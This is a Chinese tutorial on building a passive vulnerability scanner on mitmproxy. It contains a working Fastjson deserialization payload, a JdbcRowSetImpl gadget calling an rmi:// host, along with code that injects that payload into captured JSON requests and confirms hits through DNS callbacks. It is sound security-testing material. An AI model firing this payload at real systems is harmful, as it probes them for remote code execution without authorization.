基于mitmproxy的被动扫描代理
字数 1120 2025-08-18 11:39:00
基于mitmproxy的被动扫描代理开发指南
1. mitmproxy简介
mitmproxy是一款用Python编写的功能完善的代理工具,主要特点包括:
- 支持拦截HTTP和HTTPS请求和响应
- 允许即时修改流量内容
- 提供Python API用于编写自定义插件
- 可作为交互式中间人代理工具使用
2. 开发环境准备
2.1 安装mitmproxy
git clone https://github.com/mitmproxy/mitmproxy.git
cd mitmproxy
./dev.sh
当前使用的版本为5.0.0.dev(注意:5.0.5 Dev版本已不再维护libmproxy模块)
2.2 开发模式
现代mitmproxy版本推荐使用addons插件模块(内联脚本)进行扩展,调用方式:
mitmdump -s ./anatomy.py
3. mitmproxy插件基础
3.1 基本插件结构
from mitmproxy import ctx
class Counter:
def __init__(self):
self.num = 0
def request(self, flow):
self.num = self.num + 1
ctx.log.info("We've seen %d flows" % self.num)
addons = [
Counter()
]
3.2 关键概念
- flow参数:来自
mitmporxy/http.py中的HTTPflow数据流类 - 请求对象:通过
flow.request访问,类型为HTTPRequest - 响应对象:通过
flow.response访问,类型为HTTPResponse
4. 被动扫描代理实现
4.1 整体架构
采用"被动代理获取数据流 → 扫描器扫描"的思路:
- 被动扫描器获取数据流
- 将数据流导入扫描进程
- 扫描进程进行扫描并输出结果
使用双进程模型:
- 代理进程:负责流量捕获
- 扫描进程:负责漏洞检测
- 进程间通信:使用Queue队列
4.2 核心代码实现
4.2.1 主程序框架
from mitmproxy.tools._main import run
import threading
import time
from queue import Queue
request_queue = Queue()
# 扫描进程
def start_scan():
while True:
if not request_queue.empty():
print("scan", request_queue.get())
time.sleep(1)
if __name__ == '__main__':
scanner = threading.Thread(target=start_scan)
scanner.setDaemon(True) # 守护进程
scanner.start()
args = ['--listen-host', '127.0.0.1', '--listen-port', '8788']
print("Proxy server listening at http://127.0.0.1:8788")
mitmdump(args)
4.2.2 自定义DumpMaster
class DumpMaster(master.Master):
def __init__(self, options: options.Options,
with_termlog=False,
with_dumper=False,
with_handle_request=True,
with_fast_json_check=True):
super().__init__(options)
self.errorcheck = ErrorCheck()
if with_termlog:
self.addons.add(termlog.TermLog(), termstatus.TermStatus())
self.addons.add(*addons.default_addons())
if with_dumper:
self.addons.add(dumper.Dumper())
if with_handle_request:
self.addons.add(HandleRequest(request_queue)) # 添加请求处理插件
if with_fast_json_check:
self.addons.add(FastJsonCheck()) # 添加fastjson漏洞检测插件
self.addons.add(
keepserving.KeepServing(),
readfile.ReadFileStdin(),
self.errorcheck
)
4.2.3 请求处理插件
from mitmproxy import ctx
from mitmproxy.http import HTTPFlow
from gevent.queue import Queue
class HandleRequest:
def __init__(self, request_queue: Queue):
self.num = 0
self.request_queue = request_queue
def request(self, flow: HTTPFlow):
self.num = self.num + 1
self.request_queue.put(flow.request.url) # 将请求URL放入队列
def response(self, flow: HTTPFlow):
self.num = self.num + 1
5. 插件化漏洞扫描实现
5.1 Fastjson漏洞检测插件
from mitmproxy.http import HTTPFlow
import json
from urllib import parse
import copy
import requests
import time
class FastJsonCheck:
def __init__(self):
self.num = 0
def request(self, flow: HTTPFlow):
self.num = self.num + 1
req = ObjectDict()
req.target = flow.request.url
content_type = flow.request.headers.get("Content-Type")
if "application/json" in content_type:
print("start check fastjson vuln")
req.headers = flow.request.headers
req.method = flow.request.method
data = flow.request.content.decode('utf-8')
req.data = data
req_list = [req]
for req in req_list:
if req.get('data'):
check_data(req)
check_target(req)
def response(self, flow: HTTPFlow):
self.num = self.num + 1
# Fastjson检测payload
fastjson_payload = '{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://[qtn3aviq63by76utx7jcwrpxtozen3]/Exploit","autoCommit":true}}'
# DNS服务地址
dns_service_address = 'http://xxx.xxx.xxx.xxx:5000'
def get_random_dns_server():
for i in range(3):
try:
resp = requests.post('%s/genname' % dns_service_address,
json={'callback': '', 'info': ''},
timeout=(3, 6))
return str(resp.json()['name'])
except:
print('Error when get dns server:')
return None
def has_query_log_for_dns(dns_server):
for i in range(3):
try:
resp = requests.get('%s/success/%s' % (dns_service_address, dns_server),
timeout=(3, 6))
return resp.json()['success']
except:
print('Error when verify dns server:')
return None
def check_data(req_info):
data = req_info.data
content_type = req_info.headers.get("Content-Type", "application/x-www-form-urlencoded")
is_json = 'json' in content_type or 'javascript' in content_type
if not is_json:
data_dict = form2dict(data)
else:
data_dict = json.loads(data)
for x in iter_dict(data_dict, is_json):
copy_req = copy.deepcopy(req_info)
if is_json:
copy_req.data = json.dumps(x)
else:
copy_req.data = x
dns_server = get_random_dns_server()
copy_req.data = copy_req.data.replace("[qtn3aviq63by76utx7jcwrpxtozen3]", dns_server)
send_req(copy_req)
time.sleep(1.5)
if has_query_log_for_dns(dns_server):
print("[success] found fastjson vul\n{}\n".format(copy_req))
5.2 检测原理
- 识别Content-Type为application/json的请求
- 构造Fastjson反序列化payload
- 使用DNSLog技术进行漏洞验证
- 通过检查DNS查询日志判断漏洞是否存在
6. 部署与运行
- 启动代理服务器:
python3 myproxy.py
- 配置客户端使用代理:
- 地址:127.0.0.1
- 端口:8788
- 观察扫描结果:
- 控制台会输出检测到的漏洞信息
- Fastjson漏洞会显示"[success] found fastjson vuln"
7. 扩展思路
-
支持更多漏洞类型的检测:
- XXE漏洞
- SQL注入
- XSS等
-
增强功能:
- 添加报告生成模块
- 支持自定义规则
- 实现自动化扫描
-
性能优化:
- 多线程处理
- 请求去重
- 智能调度
8. 参考资源
- GitHub - w-digital-scanner/w13scan: Passive Security Scanner
- mitmproxy官方文档
- 《HTTP权威指南》
通过本指南,您可以基于mitmproxy开发功能强大的被动扫描代理,实现灵活的网络流量分析和漏洞检测。